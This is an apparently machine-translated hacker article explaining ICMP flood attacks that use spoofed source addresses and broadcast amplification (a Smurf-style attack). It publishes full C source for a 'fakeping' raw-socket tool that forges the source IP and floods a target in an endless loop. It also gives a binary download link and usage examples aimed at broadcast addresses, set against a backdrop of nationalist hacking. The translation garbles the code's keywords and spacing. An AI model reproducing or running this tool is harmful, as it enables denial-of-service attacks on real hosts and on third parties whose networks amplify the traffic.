Flood Ping attacks with disguised IP addresses)

 

Recently, many people have called on everyone to ping any website. However, technically, no matter what type of Denial-of-Service attack, one condition must be met: the minimum resource is used in exchange for the largest consumption by attackers. In this way, Ping is not only strange: the biggest resource is used in exchange for the smallest harm of the other party; it is also ridiculous: The People's War was a behavior more than 50 years ago. In the Internet era, it is not just how many people can do it.

Today we are talking about Ping. Ping is a tool used to check whether a network host exists by sending ICMP packets (Type 8 code 0). A long time ago, some operating systems (such as Win95 ), cannot handle too many ping packets, resulting in Ping to death attacks (using a large ping packet to kill the other party or fill the network). With the upgrade of the operating system, network bandwidth upgrade and computer hardware upgrade. Currently, large ping packets do not have much attack effect (except distributed attacks). If you must use ping packets to attack other hosts, unless the attack is amplified by the use of other TCP/IP features or network topology defects (so-called positive feedback)

Under normal circumstances, the ping process is as follows:

Host a sends ICMP packets to host B

Host B sends ICMP packets to host

Because ICMP is based on no link, it gives us a chance to take advantage of it. Assuming that host a is disguised as host C and sends ICMP packets, what will happen? Obviously, host B will assume that it is the packet sent by host C.

Respond to host C with the following structure:

Reply to host C errors in disguise
Host a ---------------------> host B ----------------> host C

In this case, because host a only needs to send ping packets without processing the returned ECHOREPLY, the attack is exponentially increased. In fact, both host B and host C are attacked, it does not leave its own traces. It is a concealed method of attack.

The above method can be easily achieved by disguising IP addresses with sock_raw, but even if it is doubled, it will not be very effective for a strong operating system and a large bandwidth, are we going to organize sports again? No, let the enemy enlarge it for us. The TCP/IP concept is broadcast. The so-called broadcast means that there is an address, any host in the LAN will receive messages sent to this address (just like a radio station). If? ? That's right! If we send an icmp echo packet to the broadcast address (that is, ping the broadcast address), there will be a lot of responses. In Ethernet, each host that allows receiving the broadcast packet will respond to an ICMP_ECHOREPLY, if you want to test, you can ping the broadcast address of your LAN on a unix machine, and you will see many DUP packets in response, that is, repeated responses, this problem does not occur on Windows systems, because the Ping program of Microsoft does not unpack multiple responses. After receiving the first package, the Ping program discards the next package, similarly, Microsoft's system does not respond to broadcast address packages by default, so you 'd better test it in the LAN of a large number of UNIX hosts.

Speaking of this, you must know what I want to do? Hey hey, that's right. When we pretend to be an attacked host and send a ping request to a broadcast address, all hosts in the broadcast address will respond to this ping request, equivalent to N times of attack strength! (N = number of hosts that respond to the ping packet in the broadcast address)
　

Disguised as host C, all broadcast hosts will reply incorrectly
Host a ---------------------> broadcast address ========================> host C

I wrote a fakeping tool that can be downloaded at http: // www.patching.net/shotgun/fakeping.exe.

The token is fakeping.exe fakeip targetip [packetsize]. If the targetip is a broadcast address, the fakeip is the target of the attack.

The source code is published as follows:

Typedef struct _ iphdr // defines the IP Header
{
Unsigned char h_verlen; // 4-bit header length, 4-bit IP version number
Unsigned char TOS; // an 8-bit service type TOS
Unsigned short total_len; // The total length of 16 bits (in bytes)
Unsigned short ident; // 16-bit ID
Unsigned short frag_and_flags; // 3-Bit Flag
Unsigned char TTL; // 8-bit TTL
Unsigned char proto; // 8-bit protocol (TCP, UDP, or other)
Unsigned short checksum; // 16-bit IP header checksum
Unsigned int sourceip; // 32-bit source IP address
Unsigned int destip; // 32-bit destination IP address
} Ip_header;

// Define the ICMP Header
Typedef struct _ ihdr
{
Byte I _type; // 8-bit type
Byte I _code; // 8-bit code
Ushort I _cksum; // 16-bit checksum
Ushort I _id; // identification number (process number is generally used as the identification number)
Ushort I _seq; // message serial number
Ulong timestamp; // Timestamp
} Icmp_header;

// Checksum: The subfunction used to calculate the checksum.
Ushort checksum (ushort * buffer, int size)
{
Unsigned long cksum = 0;
While (size> 1)
{
Cksum + = * buffer ++;
Size-= sizeof (ushort );
}
If (size)
{
Cksum + = * (uchar *) buffer;
}
Cksum = (cksum> 16) + (cksum & 0 xFFFF );
Cksum + = (cksum> 16 );
Return (ushort )(~ Cksum );
}

// Fakeping Main Function
Int main (INT argc, char ** argv)
{
Int datasize, errorcode, counter, flag;
Int timeout = 2000, sendseq = 0, packetsize = 32;
Char sendbuf [65535] = {0 };
Wsadata;
Socket sockraw = (socket) NULL;
Struct sockaddr_in destaddr;
Ip_header;
Icmp_header;
Char fakesourceip [20], destip [20];

// Accept command line parameters
If (argc <3)
{
Printf ("fakeping by shotgun
");
Printf ("This program can do ping-flooding from a fakeip
");
Printf ("using a broadcast IP as the fakeip will enhance the effect
");
Printf ("Email:
");
Printf ("Shotgun@Xici.Net
");
Printf ("homepage:
");
Printf ("http://It.Xici.Net
");
Printf ("http://www.Patching.Net
");
Printf ("Usage:
Fakeping.exe fakesourceip destinationip [packetsize]
");
Printf ("Example:
");
Printf ("fakeping.exe 192.168.15.23 192.168.15.255
");
Printf ("fakeping.exe 192.168.15.23 192.168.15.200 6400
");
Exit (0 );
}
Strcpy (fakesourceip, argv [1]);
Strcpy (destip, argv [2]);
If (argc> 3) packetsize = atoi (argv [3]);
If (packetsize> 60000)
{
Printf ("error! Packet size too big, must <60 k
");
Exit (0 );
}
Printf ("now fake % s Ping % s using packet size = % d bytes
",
Fakesourceip, destip, packetsize );
Printf ("Ctrl + C to quit
");
// Initialize sock_raw
If (errorcode = wsastartup (makeword (2, 1), & wsadata ))! = 0)
{
Fprintf (stderr, "wsastartup failed: % d
", Errorcode );
Exitprocess (status_failed );
}

If (sockraw = wsasocket (af_inet, sock_raw, ipproto_raw, null, 0, wsa_flag_overlapped) = invalid_socket)
{
Fprintf (stderr, "wsasocket () failed: % d
", Wsagetlasterror ());
Exitprocess (status_failed );
}
Flag = true;

// Set ip_hdrincl to fill the IP Header
Errorcode = setsockopt (sockraw, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (INT ));
If (errorcode = socket_error)
Printf ("set ip_hdrincl error!
");
_ Try
{

// Set sending timeout
Errorcode = setsockopt (sockraw, sol_socket, so_sndtimeo, (char *) & timeout, sizeof (timeout ));
If (errorcode = socket_error)
{
Fprintf (stderr, "failed to set send Timeout: % d
", Wsagetlasterror ());
_ Leave;
}
Memset (& destaddr, 0, sizeof (destaddr ));
Destaddr. sin_family = af_inet;
Destaddr. sin_addr.s_addr = inet_addr (destip );

// Fill in the IP Header
Ip_header.h_verlen = (4 <4 | sizeof (ip_header)/sizeof (unsigned long); // the version number of the four-digit IP address, with the length of the four-digit Header
Ip_header.total_len = htons (sizeof (ip_header) + sizeof (icmp_header); // The total length of 16 bits (in bytes)
Ip_header.ident = 1;

// 16-bit ID
Ip_header.frag_and_flags = 0;

// 3-digit flag
Ip_header.ttl = 128;

// 8-bit TTL
Ip_header.proto = ipproto_icmp;

// 8-bit protocol (TCP, UDP, or other)
Ip_header.checksum = 0;

// 16-bit IP header checksum
Ip_header.sourceip = inet_addr (fakesourceip); // 32

Bit source IP address
Ip_header.destip = inet_addr (destip );

// 32-bit destination IP address
// Fill the ICMP Header
Icmp_header. I _type = 8;
Icmp_header. I _code = 0;
Icmp_header. I _cksum = 0;
Icmp_header. I _id = 2;
Icmp_header.timestamp = 999;
Icmp_header. I _seq = 999;
Memcpy (sendbuf, & icmp_header, sizeof (icmp_header ));
Memset (sendbuf + sizeof (icmp_header), 'E', packetsize );
Icmp_header. I _cksum = checksum (ushort *) sendbuf, sizeof (icmp_header) + packetsize );
Memcpy (sendbuf, & ip_header, sizeof (ip_header ));
Memcpy (sendbuf + sizeof (ip_header), & icmp_header, sizeof (icmp_header ));
Memset (sendbuf + sizeof (ip_header) + sizeof (icmp_header), 'E', packetsize );
Memset (sendbuf + sizeof (ip_header) + sizeof (icmp_header) + packetsize, 0, 1 );
// Calculate the size of the sending Buffer
Datasize = sizeof (ip_header) + sizeof (icmp_header) + packetsize;
Ip_header.checksum = checksum (ushort *) sendbuf, datasize );

// Fill the sending Buffer
Memcpy (sendbuf, & ip_header, sizeof (ip_header ));
While (1)
{
Sleep (100 );
Printf (".");
For (counter = 0; counter <1024; counter ++)
{
// Send an ICMP Packet
Errorcode = sendto (sockraw, sendbuf, datasize, 0, (struct sockaddr *) & destaddr, sizeof (destaddr ));
If (errorcode = socket_error) printf ("
Send error: % d
", Getlasterror ());
}
}
} // End of try

_ Finally
{
If (sockraw! = Invalid_socket) closesocket (sockraw );
Wsacleanup ();
}
Return 0;
}

The purpose of this article is not to call everyone to use the fakeping tool to attack the U.S. site. I just want to show a little bit about what the technology can do. If we say that we can fight the cannon by Using Ping together, fakeping can only be regarded as a firegun, the United States has developed an aircraft carrier (the complexity of an operating system is comparable to that of an aircraft carrier). Is it possible to use a large knife, long gun, or fire gun to fight the aircraft carrier? This is very touching and tragic, but there is no other way? Can't we go back and develop our own battleship? If the experts of the Second Artillery in this red guest war also come out to participate in Ping, if Xichang's technical staff also go to participate in the black homepage movement, we will not die!